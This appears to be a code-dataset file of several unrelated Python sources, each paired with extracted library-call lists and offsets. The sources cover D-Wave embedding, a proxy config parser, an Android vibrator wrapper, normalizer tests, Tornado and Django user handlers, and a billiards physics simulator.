| [
"dwave.embedding.unembed_sampleset",
"dwave.embedding.utils.edgelist_to_adjacency",
"dimod.BQM.from_ising",
"dwave.cloud.Client.from_config",
"minorminer.find_embedding",
"dwave.embedding.embed_bqm",
"dimod.BinaryQuadraticModel.from_coo"
] | [((254, 307), 'dimod.BQM.from_ising', 'dimod.BQM.from_ising', (['{}', "{'ab': 1, 'bc': 1, 'ca': 1}"], {}), "({}, {'ab': 1, 'bc': 1, 'ca': 1})\n", (274, 307), False, 'import dimod\n'), ((522, 542), 'dwave.cloud.Client.from_config', 'Client.from_config', ([], {}), '()\n', (540, 542), False, 'from dwave.cloud import Client\n'), ((720, 768), 'minorminer.find_embedding', 'find_embedding', (['source_edgelist', 'target_edgelist'], {}), '(source_edgelist, target_edgelist)\n', (734, 768), False, 'from minorminer import find_embedding\n'), ((788, 826), 'dwave.embedding.utils.edgelist_to_adjacency', 'edgelist_to_adjacency', (['target_edgelist'], {}), '(target_edgelist)\n', (809, 826), False, 'from dwave.embedding.utils import edgelist_to_adjacency\n'), ((842, 885), 'dwave.embedding.embed_bqm', 'embed_bqm', (['bqm', 'embedding', 'target_adjacency'], {}), '(bqm, embedding, target_adjacency)\n', (851, 885), False, 'from dwave.embedding import embed_bqm, unembed_sampleset\n'), ((1128, 1181), 'dwave.embedding.unembed_sampleset', 'unembed_sampleset', (['sampleset_embedded', 'embedding', 'bqm'], {}), '(sampleset_embedded, embedding, bqm)\n', (1145, 1181), False, 'from dwave.embedding import embed_bqm, unembed_sampleset\n'), ((433, 472), 'dimod.BinaryQuadraticModel.from_coo', 'dimod.BinaryQuadraticModel.from_coo', (['fp'], {}), '(fp)\n', (468, 472), False, 'import dimod\n')] |
#!/usr/bin/env python
from __future__ import print_function
import os
import requests
import subprocess
import sys
import re
from cli.appconfig import AppConfig
from cli.settings import Settings
requests.packages.urllib3.disable_warnings()
class ProxyParser:
path_begin_values = {}
backend_services_tcp_ports = {}
def get_proxy_config(self, environment):
proxy_config = ""
settingObj = Settings()
appObj = AppConfig()
config_dir = settingObj.getConfigDir()
roger_env = appObj.getRogerEnv(config_dir)
host = roger_env['environments'][environment]['host']
proxy_config_path = roger_env['environments'][
environment]['proxy_config_path']
url = "{}{}".format(host, proxy_config_path)
proxy_config = requests.get(url).json()
return proxy_config
def parseConfig(self, environment):
path_begin_values = {}
backend_tcp_ports = {}
config = self.get_proxy_config(environment)
for app in config['Apps']:
if 'HTTP_PREFIX' in app['Env']:
path_begin_values[app['Env']['HTTP_PREFIX']] = app['Id']
if app['TcpPorts'] is not None:
for port in app['TcpPorts'].keys():
backend_tcp_ports[port] = app['Id']
self.set_path_begin_values(path_begin_values)
self.set_backend_tcp_ports(backend_tcp_ports)
def set_path_begin_values(self, path_begin_values_aclnames):
self.path_begin_values = path_begin_values_aclnames
def get_path_begin_values(self):
return self.path_begin_values
def set_backend_tcp_ports(self, backend_services_tcp_ports):
self.backend_services_tcp_ports = backend_services_tcp_ports
def get_backend_tcp_ports(self):
return self.backend_services_tcp_ports
| [
"cli.appconfig.AppConfig",
"cli.settings.Settings",
"requests.packages.urllib3.disable_warnings",
"requests.get"
] | [((196, 240), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ([], {}), '()\n', (238, 240), False, 'import requests\n'), ((419, 429), 'cli.settings.Settings', 'Settings', ([], {}), '()\n', (427, 429), False, 'from cli.settings import Settings\n'), ((447, 458), 'cli.appconfig.AppConfig', 'AppConfig', ([], {}), '()\n', (456, 458), False, 'from cli.appconfig import AppConfig\n'), ((796, 813), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (808, 813), False, 'import requests\n')] |
"""Implementation Vibrator for Android."""
from jnius import autoclass, cast
from plyer.facades import Vibrator
from plyer.platforms.android import activity
from plyer.platforms.android import SDK_INT
Context = autoclass("android.content.Context")
vibrator_service = activity.getSystemService(Context.VIBRATOR_SERVICE)
vibrator = cast("android.os.Vibrator", vibrator_service)
if SDK_INT >= 26:
VibrationEffect = autoclass("android.os.VibrationEffect")
class AndroidVibrator(Vibrator):
"""Android Vibrator class.
Supported features:
* vibrate for some period of time.
* vibrate from given pattern.
* cancel vibration.
* check whether Vibrator exists.
"""
def _vibrate(self, time=None, **kwargs):
if vibrator:
if SDK_INT >= 26:
vibrator.vibrate(
VibrationEffect.createOneShot(
int(1000 * time), VibrationEffect.DEFAULT_AMPLITUDE
)
)
else:
vibrator.vibrate(int(1000 * time))
def _pattern(self, pattern=None, repeat=None, **kwargs):
pattern = [int(1000 * time) for time in pattern]
if vibrator:
if SDK_INT >= 26:
vibrator.vibrate(
VibrationEffect.createWaveform(pattern, repeat)
)
else:
vibrator.vibrate(pattern, repeat)
def _exists(self, **kwargs):
if SDK_INT >= 11:
return vibrator.hasVibrator()
elif vibrator_service is None:
raise NotImplementedError()
return True
def _cancel(self, **kwargs):
vibrator.cancel()
def instance():
"""Returns Vibrator with android features.
:return: instance of class AndroidVibrator
"""
return AndroidVibrator()
| [
"jnius.autoclass",
"plyer.platforms.android.activity.getSystemService",
"jnius.cast"
] | [((213, 249), 'jnius.autoclass', 'autoclass', (['"""android.content.Context"""'], {}), "('android.content.Context')\n", (222, 249), False, 'from jnius import autoclass, cast\n'), ((269, 320), 'plyer.platforms.android.activity.getSystemService', 'activity.getSystemService', (['Context.VIBRATOR_SERVICE'], {}), '(Context.VIBRATOR_SERVICE)\n', (294, 320), False, 'from plyer.platforms.android import activity\n'), ((332, 377), 'jnius.cast', 'cast', (['"""android.os.Vibrator"""', 'vibrator_service'], {}), "('android.os.Vibrator', vibrator_service)\n", (336, 377), False, 'from jnius import autoclass, cast\n'), ((418, 457), 'jnius.autoclass', 'autoclass', (['"""android.os.VibrationEffect"""'], {}), "('android.os.VibrationEffect')\n", (427, 457), False, 'from jnius import autoclass, cast\n')] |
from secml.ml.features.normalization.tests import CNormalizerTestCases
from sklearn.preprocessing import StandardScaler
from secml.ml.features.normalization import CNormalizerMeanStd
class TestCNormalizerMeanStd(CNormalizerTestCases):
    """Unittests for CNormalizerMeanStd."""

    def test_transform(self):
        """Compare `.transform()` against sklearn's StandardScaler.

        Runs the comparison for every supported array layout
        (dense/sparse matrices, row/column vectors), both with and
        without std scaling.
        """
        for with_std in (True, False):
            self.logger.info("Testing using std? {:}".format(with_std))
            # One loop over the layouts replaces six copy-pasted
            # _sklearn_comp calls; a fresh scaler/normalizer pair is
            # built per comparison, exactly as before.
            for array in (self.array_dense,
                          self.array_sparse,
                          self.row_dense.atleast_2d(),
                          self.row_sparse,
                          self.column_dense,
                          self.column_sparse):
                self._sklearn_comp(array,
                                   StandardScaler(with_std=with_std),
                                   CNormalizerMeanStd(with_std=with_std))

    def test_mean_std(self):
        """Test using specific mean/std, including round-trip inversion."""
        for (mean, std) in [(1.5, 0.1),
                            ((1.0, 1.1, 1.2, 1.3), (0.0, 0.1, 0.2, 0.3))]:
            for array in [self.array_dense, self.array_sparse]:
                self.logger.info("Original array is:\n{:}".format(array))
                self.logger.info(
                    "Normalizing using mean: {:} std: {:}".format(mean, std))
                n = CNormalizerMeanStd(mean=mean, std=std).fit(array)
                out = n.transform(array)
                self.logger.info("Result is:\n{:}".format(out))
                out_mean = out.mean(axis=0, keepdims=False)
                out_std = out.std(axis=0, keepdims=False)
                self.logger.info("Result mean is:\n{:}".format(out_mean))
                self.logger.info("Result std is:\n{:}".format(out_std))
                # The inverse transform must reproduce the original data.
                rev = n.inverse_transform(out)
                self.assert_array_almost_equal(array, rev)

    def test_chain(self):
        """Test a chain of preprocessors."""
        self._test_chain(self.array_dense,
                         ['min-max', 'pca', 'mean-std'],
                         [{'feature_range': (-5, 5)}, {}, {}])

    def test_chain_gradient(self):
        """Check gradient of a chain of preprocessors."""
        self._test_chain_gradient(self.array_dense,
                                  ['min-max', 'mean-std'],
                                  [{'feature_range': (-5, 5)}, {}])
if __name__ == '__main__':
CNormalizerTestCases.main()
| [
"sklearn.preprocessing.StandardScaler",
"secml.ml.features.normalization.CNormalizerMeanStd",
"secml.ml.features.normalization.tests.CNormalizerTestCases.main"
] | [((3128, 3155), 'secml.ml.features.normalization.tests.CNormalizerTestCases.main', 'CNormalizerTestCases.main', ([], {}), '()\n', (3153, 3155), False, 'from secml.ml.features.normalization.tests import CNormalizerTestCases\n'), ((553, 586), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (567, 586), False, 'from sklearn.preprocessing import StandardScaler\n'), ((619, 656), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (637, 656), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((739, 772), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (753, 772), False, 'from sklearn.preprocessing import StandardScaler\n'), ((805, 842), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (823, 842), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((935, 968), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (949, 968), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1001, 1038), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1019, 1038), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1119, 1152), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1133, 1152), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1185, 1222), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1203, 1222), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1305, 
1338), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1319, 1338), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1371, 1408), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1389, 1408), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((1492, 1525), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1506, 1525), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1558, 1595), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'with_std': 'with_std'}), '(with_std=with_std)\n', (1576, 1595), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n'), ((2057, 2095), 'secml.ml.features.normalization.CNormalizerMeanStd', 'CNormalizerMeanStd', ([], {'mean': 'mean', 'std': 'std'}), '(mean=mean, std=std)\n', (2075, 2095), False, 'from secml.ml.features.normalization import CNormalizerMeanStd\n')] |
# coding=utf8
from base import ApiBase
from tornado.gen import coroutine, Return
from service.user import ServiceUser
class ApiUserBase(ApiBase):
    """Common base for user API handlers: attaches a ServiceUser instance."""

    def __init__(self, *args, **kwargs):
        super(ApiUserBase, self).__init__(*args, **kwargs)
        # Shared data-access service used by every user endpoint below.
        self.srv_user = ServiceUser()
class ApiUserLogin(ApiUserBase):
    """POST /login handler (incomplete: neither branch responds yet)."""

    @coroutine
    def post(self, *args, **kwargs):
        username = self.get_argument('username')
        password = self.get_argument('password')
        # NOTE(review): ApiUserDetail `yield`s its srv_user call; if
        # find_one_by_username_password is also a coroutine this binds a
        # Future (always truthy), not a user -- confirm and add `yield`.
        user = self.srv_user.find_one_by_username_password(username, password)
        if user:
            pass  # TODO: establish a session/token and respond with success.
        else:
            pass  # TODO: respond with an authentication-failure error.
class ApiUserDetail(ApiUserBase):
    """GET handler returning a single user (looked up by id) as JSON."""

    @coroutine
    def get(self, user_id):
        # Asynchronous lookup; yields until the service resolves the user.
        user = yield self.srv_user.find_one_by_id(user_id)
        self.json_success(data=user)
class ApiUserRegister(ApiUserBase):
    """POST handler that validates registration input and creates a user."""

    @coroutine
    def post(self, *args, **kwargs):
        username = self.get_argument('username')
        password = self.get_argument('password')
        phone = self.get_argument('phone')
        sex = self.get_argument('sex')
        # Service-side validation first; msg explains any rejection.
        valid, msg = yield self.srv_user.check_register(username, password, phone, sex)
        if valid:
            user_id = yield self.srv_user.create(username, password, phone, sex)
            self.json_success(data=user_id)
        else:
            self.json_error(msg=msg)
| [
"service.user.ServiceUser"
] | [((272, 285), 'service.user.ServiceUser', 'ServiceUser', ([], {}), '()\n', (283, 285), False, 'from service.user import ServiceUser\n')] |
# Copyright 2021 sunehabose
# MIT License
import sys
import unittest
from unittest.mock import patch
sys.path.insert(0, 'code')
import code.user_cli
class TestUserCLI(unittest.TestCase):
    """Drive code.user_cli.user_menu() with canned stdin choices."""

    @patch('builtins.input', return_value='1')
    def test_user_menu_1(self, mock_input) -> None:
        """Menu choice '1' completes without raising."""
        code.user_cli.user_menu()

    @patch('builtins.input', return_value='2')
    def test_user_menu_2(self, mock_input) -> None:
        """Menu choice '2' completes without raising."""
        code.user_cli.user_menu()

    @patch('builtins.input', return_value='q')
    def test_user_menu_q(self, mock_input) -> None:
        """Menu choice 'q' exits the program with status code 0."""
        with self.assertRaises(SystemExit) as ctx:
            code.user_cli.user_menu()
        self.assertEqual(ctx.exception.code, 0)
| [
"sys.path.insert",
"unittest.mock.patch"
] | [((102, 128), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""code"""'], {}), "(0, 'code')\n", (117, 128), False, 'import sys\n'), ((196, 237), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""1"""'}), "('builtins.input', return_value='1')\n", (201, 237), False, 'from unittest.mock import patch\n'), ((330, 371), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""2"""'}), "('builtins.input', return_value='2')\n", (335, 371), False, 'from unittest.mock import patch\n'), ((464, 505), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {'return_value': '"""q"""'}), "('builtins.input', return_value='q')\n", (469, 505), False, 'from unittest.mock import patch\n')] |
from itertools import combinations
import numpy as np
from PlanningCore.core.constants import State
from PlanningCore.core.physics import (
ball_ball_collision,
ball_cushion_collision,
cue_strike,
evolve_ball_motion,
get_ball_ball_collision_time,
get_ball_cushion_collision_time,
get_roll_time,
get_spin_time,
get_slide_time,
)
from PlanningCore.core.utils import get_rel_velocity
def evolve(pockets, balls, dt):
    """Advance every ball's motion state by one timestep ``dt``."""
    for ball in balls:
        new_rvw, new_state = evolve_ball_motion(
            pockets=pockets,
            state=ball.state,
            rvw=ball.rvw,
            t=dt,
        )
        ball.set_rvw(new_rvw)
        ball.set_state(new_state)
def resolve(collision, table):
    """Apply the physics of a detected collision to the involved agents.

    Both outcomes leave the affected ball(s) in the sliding state.
    """
    kind = collision['type']
    if kind == 'ball_ball':
        id1, id2 = collision['agents']
        new1, new2 = ball_ball_collision(table.balls[id1].rvw,
                                        table.balls[id2].rvw)
        for ball_id, rvw in ((id1, new1), (id2, new2)):
            table.balls[ball_id].set_rvw(rvw)
            table.balls[ball_id].set_state(State.sliding)
    elif kind == 'ball_cushion':
        ball_id, cushion_id = collision['agents']
        bounced = ball_cushion_collision(
            table.balls[ball_id].rvw,
            table.cushions[cushion_id]['normal'])
        table.balls[ball_id].set_rvw(bounced)
        table.balls[ball_id].set_state(State.sliding)
def detect_collisions(table):
    """Return all currently-active collisions on ``table``.

    Returns:
        list[dict]: each entry is {'type': 'ball_ball'|'ball_cushion',
        'agents': (i, j) ball indices, or (i, cushion_id) with cushion_id
        one of 'L'/'R'/'B'/'T'}.
    """
    collisions = []
    # Ball-ball: iterate each unordered pair once via combinations
    # (consistent with get_min_ball_ball_event_time) instead of the
    # manual i >= j double loop; same pairs, same order.
    for (i, ball1), (j, ball2) in combinations(enumerate(table.balls), 2):
        if ball1.state == State.stationary and ball2.state == State.stationary:
            continue
        # Overlapping (or touching) balls are colliding.
        if np.linalg.norm(ball1.rvw[0] - ball2.rvw[0]) <= (ball1.radius + ball2.radius):
            collisions.append({
                'type': 'ball_ball',
                'agents': (i, j),
            })
    # Ball-cushion: elif chain deliberately reports at most one cushion
    # per ball (left/right take precedence over bottom/top).
    for i, ball in enumerate(table.balls):
        ball_x, ball_y = ball.pos
        if ball_x <= table.left + ball.radius:
            collisions.append({
                'type': 'ball_cushion',
                'agents': (i, 'L'),
            })
        elif ball_x >= table.right - ball.radius:
            collisions.append({
                'type': 'ball_cushion',
                'agents': (i, 'R'),
            })
        elif ball_y <= table.bottom + ball.radius:
            collisions.append({
                'type': 'ball_cushion',
                'agents': (i, 'B'),
            })
        elif ball_y >= table.top - ball.radius:
            collisions.append({
                'type': 'ball_cushion',
                'agents': (i, 'T'),
            })
    return collisions
def get_min_motion_event_time(balls):
    """Find the soonest motion-state transition among all balls.

    Returns:
        tuple: (time, (ball_index,), transition_name); time is np.inf
        when no ball is rolling, sliding or spinning.
    """
    best_t = np.inf
    best_ball = None
    best_transition = None
    for idx, ball in enumerate(balls):
        if ball.state == State.rolling:
            t = get_roll_time(ball.rvw)
            transition = ('rolling_spinning'
                          if get_spin_time(ball.rvw) > t
                          else 'rolling_stationary')
        elif ball.state == State.sliding:
            t = get_slide_time(ball.rvw)
            transition = 'sliding_rolling'
        elif ball.state == State.spinning:
            t = get_spin_time(ball.rvw)
            transition = 'spinning_stationary'
        else:
            # Stationary / pocketed balls produce no motion events.
            continue
        if t < best_t:
            best_t, best_ball, best_transition = t, idx, transition
    return best_t, (best_ball,), best_transition
def get_min_ball_ball_event_time(balls):
    """Earliest predicted ball-ball collision time over all pairs.

    Returns:
        tuple: (time, (i, j)); time is np.inf and indices are None when
        no pair can collide.
    """
    best = np.inf
    pair = (None, None)
    for (i, b1), (j, b2) in combinations(enumerate(balls), 2):
        # Pocketed balls never collide; two stationary balls cannot.
        if b1.state == State.pocketed or b2.state == State.pocketed:
            continue
        if b1.state == State.stationary and b2.state == State.stationary:
            continue
        t = get_ball_ball_collision_time(
            rvw1=b1.rvw,
            rvw2=b2.rvw,
            s1=b1.state,
            s2=b2.state,
        )
        if t < best:
            best, pair = t, (i, j)
    return best, pair
def get_min_ball_cushion_event_time(balls, cushions):
    """Returns minimum time until next ball-rail collision"""
    best = np.inf
    agents = (None, None)
    for ball_id, ball in enumerate(balls):
        # Motionless and pocketed balls cannot reach a cushion.
        if ball.state in (State.stationary, State.pocketed):
            continue
        for cushion_id, cushion in cushions.items():
            t = get_ball_cushion_collision_time(
                rvw=ball.rvw,
                s=ball.state,
                lx=cushion['lx'],
                ly=cushion['ly'],
                l0=cushion['l0'],
            )
            if t < best:
                best = t
                agents = (ball_id, cushion_id)
    return best, agents
def get_next_event(table):
    """Return the soonest upcoming Event on ``table``.

    Candidates are gathered in priority order (motion, ball-ball,
    ball-cushion); min() is stable, so ties resolve exactly as the
    strict-less-than scan did.
    """
    candidates = [(np.inf, tuple(), None)]  # sentinel: "nothing happens"
    t, ids, transition = get_min_motion_event_time(table.balls)
    candidates.append((t, ids, transition))
    t, ids = get_min_ball_ball_event_time(table.balls)
    candidates.append((t, ids, 'ball_ball'))
    t, ids = get_min_ball_cushion_event_time(table.balls, table.cushions)
    candidates.append((t, ids, 'ball_cushion'))
    event_time, agents, event_type = min(candidates, key=lambda c: c[0])
    return Event(event_type=event_type, event_time=event_time, agents=agents)
def simulate(table, dt=0.033, log=False, no_ball_cushion=False, return_once_pocket=False):
    """Run a fixed-timestep simulation until every ball is stationary or pocketed.

    Args:
        table: table object exposing ``balls``, ``pockets`` and ``snapshot``.
        dt (float): timestep in seconds between evolution updates.
        log (bool): if True, snapshot the table before and after resolving.
        no_ball_cushion (bool): abort (return False) on any ball-cushion hit.
        return_once_pocket (bool): return True as soon as any ball is pocketed.

    Returns:
        bool: False only when ``no_ball_cushion`` aborted the run, else True.
    """
    while True:
        if return_once_pocket:
            for ball in table.balls:
                if ball.state == State.pocketed:
                    return True
        # Built-in all() short-circuits and avoids materializing a list
        # for np.all; truthiness is identical.
        if all(ball.state == State.stationary or ball.state == State.pocketed
               for ball in table.balls):
            break
        evolve(table.pockets, table.balls, dt)
        if log:
            table.snapshot(dt)
        collisions = detect_collisions(table)
        for collision in collisions:
            if no_ball_cushion and collision['type'] == 'ball_cushion':
                return False
            resolve(collision, table)
        if log:
            table.snapshot(dt)
    return True
def simulate_event_based(table, log=False, return_once_pocket=False):
    """Event-driven simulation: jump straight to each next event time.

    Args:
        table: table object exposing ``balls``, ``pockets`` and ``snapshot``.
        log (bool): if True, snapshot the table after each event.
        return_once_pocket (bool): return True as soon as any ball is pocketed.

    Returns:
        bool: always True (kept for symmetry with ``simulate``).
    """
    event = Event()
    # Event() defaults to event_time=0, so the loop always runs once;
    # get_next_event returns event_time=np.inf when nothing remains.
    while event.event_time < np.inf:
        event = get_next_event(table)
        if return_once_pocket:
            for ball in table.balls:
                if ball.state == State.pocketed:
                    return True
        # Built-in all() short-circuits and avoids materializing a list
        # for np.all; truthiness is identical.
        if all(ball.state == State.stationary or ball.state == State.pocketed
               for ball in table.balls):
            break
        evolve(table.pockets, table.balls, dt=event.event_time)
        resolve(event.as_dict(), table)
        if log:
            table.snapshot(event.event_time)
    return True
def shot(table, v_cue, phi, ball_index=0, theta=0, a=0, b=0):
    """Strike a ball with the cue and set its resulting motion state.

    Args:
        table: table whose ``balls[ball_index]`` receives the strike.
        v_cue: cue speed.
        phi: azimuthal strike angle.
        ball_index (int): index of the struck ball (default 0).
        theta: cue elevation angle.
        a, b: strike offsets on the ball (impart spin).
    """
    v, w = cue_strike(v_cue, phi, theta, a, b)
    rvw = table.balls[ball_index].rvw
    rvw[1] = v
    rvw[2] = w
    # NOTE(review): np.abs(np.sum(...)) sums the relative-velocity
    # components *before* taking abs, so opposite-signed components can
    # cancel and misclassify a sliding ball as rolling -- a norm may be
    # intended here; confirm against the physics module.
    state = State.rolling if np.abs(np.sum(get_rel_velocity(rvw))) <= 1e-10 else State.sliding
    table.balls[ball_index].set_rvw(rvw)
    table.balls[ball_index].set_state(state)
class Event(object):
    """A scheduled simulation event: what happens, when, and to whom.

    event_type is one of the motion-transition names, 'ball_ball' or
    'ball_cushion' (None for the sentinel); agents holds the involved
    ball/cushion identifiers.
    """

    def __init__(self, event_type=None, event_time=0, agents=None):
        self.event_type = event_type
        self.event_time = event_time
        self.agents = agents

    def as_dict(self):
        """Return the dict form expected by resolve()."""
        return dict(
            type=self.event_type,
            time=self.event_time,
            agents=self.agents,
        )
"PlanningCore.core.utils.get_rel_velocity",
"numpy.all",
"PlanningCore.core.physics.get_ball_cushion_collision_time",
"PlanningCore.core.physics.get_ball_ball_collision_time",
"PlanningCore.core.physics.get_roll_time",
"PlanningCore.core.physics.evolve_ball_motion",
"PlanningCore.core.physics.get_slide_... | [((7095, 7130), 'PlanningCore.core.physics.cue_strike', 'cue_strike', (['v_cue', 'phi', 'theta', 'a', 'b'], {}), '(v_cue, phi, theta, a, b)\n', (7105, 7130), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((497, 570), 'PlanningCore.core.physics.evolve_ball_motion', 'evolve_ball_motion', ([], {'pockets': 'pockets', 'state': 'ball.state', 'rvw': 'ball.rvw', 't': 'dt'}), '(pockets=pockets, state=ball.state, rvw=ball.rvw, t=dt)\n', (515, 570), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((914, 945), 'PlanningCore.core.physics.ball_ball_collision', 'ball_ball_collision', (['rvw1', 'rvw2'], {}), '(rvw1, rvw2)\n', (933, 945), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((4003, 4099), 'PlanningCore.core.physics.get_ball_ball_collision_time', 'get_ball_ball_collision_time', ([], {'rvw1': 'ball1.rvw', 'rvw2': 'ball2.rvw', 's1': 'ball1.state', 's2': 'ball2.state'}), '(rvw1=ball1.rvw, rvw2=ball2.rvw, s1=ball1.state,\n s2=ball2.state)\n', (4031, 4099), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((5850, 5952), 'numpy.all', 'np.all', (['[(ball.state == State.stationary or ball.state == State.pocketed) for ball in\n table.balls]'], {}), '([(ball.state == State.stationary or ball.state == 
State.pocketed) for\n ball in table.balls])\n', (5856, 5952), True, 'import numpy as np\n'), ((6702, 6804), 'numpy.all', 'np.all', (['[(ball.state == State.stationary or ball.state == State.pocketed) for ball in\n table.balls]'], {}), '([(ball.state == State.stationary or ball.state == State.pocketed) for\n ball in table.balls])\n', (6708, 6804), True, 'import numpy as np\n'), ((1375, 1410), 'PlanningCore.core.physics.ball_cushion_collision', 'ball_cushion_collision', (['rvw', 'normal'], {}), '(rvw, normal)\n', (1397, 1410), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3035, 3058), 'PlanningCore.core.physics.get_roll_time', 'get_roll_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3048, 3058), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3082, 3105), 'PlanningCore.core.physics.get_spin_time', 'get_spin_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3095, 3105), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((4632, 4750), 'PlanningCore.core.physics.get_ball_cushion_collision_time', 'get_ball_cushion_collision_time', ([], {'rvw': 'ball.rvw', 's': 'ball.state', 'lx': "cushion['lx']", 'ly': "cushion['ly']", 'l0': "cushion['l0']"}), "(rvw=ball.rvw, s=ball.state, lx=cushion['lx'\n ], ly=cushion['ly'], l0=cushion['l0'])\n", (4663, 4750), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, 
get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((1840, 1883), 'numpy.linalg.norm', 'np.linalg.norm', (['(ball1.rvw[0] - ball2.rvw[0])'], {}), '(ball1.rvw[0] - ball2.rvw[0])\n', (1854, 1883), True, 'import numpy as np\n'), ((3250, 3274), 'PlanningCore.core.physics.get_slide_time', 'get_slide_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3264, 3274), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((3377, 3400), 'PlanningCore.core.physics.get_spin_time', 'get_spin_time', (['ball.rvw'], {}), '(ball.rvw)\n', (3390, 3400), False, 'from PlanningCore.core.physics import ball_ball_collision, ball_cushion_collision, cue_strike, evolve_ball_motion, get_ball_ball_collision_time, get_ball_cushion_collision_time, get_roll_time, get_spin_time, get_slide_time\n'), ((7242, 7263), 'PlanningCore.core.utils.get_rel_velocity', 'get_rel_velocity', (['rvw'], {}), '(rvw)\n', (7258, 7263), False, 'from PlanningCore.core.utils import get_rel_velocity\n')] |
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import Context, loader
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth import authenticate
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from core.models import Category, Post
from core.forms import CreateAccForm, ForgotPasswordForm, PostForm
@login_required
def index(request):
    """Render the landing page with all categories and a blank post form."""
    context = {
        'categories': get_categories(),
        'form': PostForm(),
    }
    return render(request, 'core/index.html', context)
def login(request):
    """Authenticate and log a user in (POST), or show the login page (GET)."""
    if request.method != 'POST':
        # GET: render the login form.
        t = loader.get_template('core/login.html')
        return HttpResponse(t.render(Context()))
    user = authenticate(username=request.POST["username"],
                        password=request.POST["password"])
    if user is not None:
        login_user(request, user)
        return HttpResponseRedirect('/')
    return HttpResponse('Error: could not log in')
def logout(request):
    """Log the current user out and send them to the login page.

    Fix: the original called the undefined name ``redirect`` (NameError
    at runtime) and passed the format string and its arguments as two
    separate parameters, so the ``%s`` substitution never happened.
    Build the URL explicitly and use the imported HttpResponseRedirect.
    """
    logout_user(request)
    return HttpResponseRedirect('%s?next=%s' % (settings.LOGIN_URL, request.path))
# create account view
def createacc(request):
    """Account-creation view: show the signup form (GET) or register (POST)."""
    form = CreateAccForm()
    if request.method != "POST":
        return render(request, 'core/createacc.html', {'form': form})
    form = CreateAccForm(request.POST)
    if not form.is_valid():
        print("invalid form")
        return render(request, 'core/createacc.html', {'form': form})
    print("about to create new user")
    data = form.cleaned_data
    # Create the account, then authenticate with the same credentials
    # so the new user is logged in immediately.
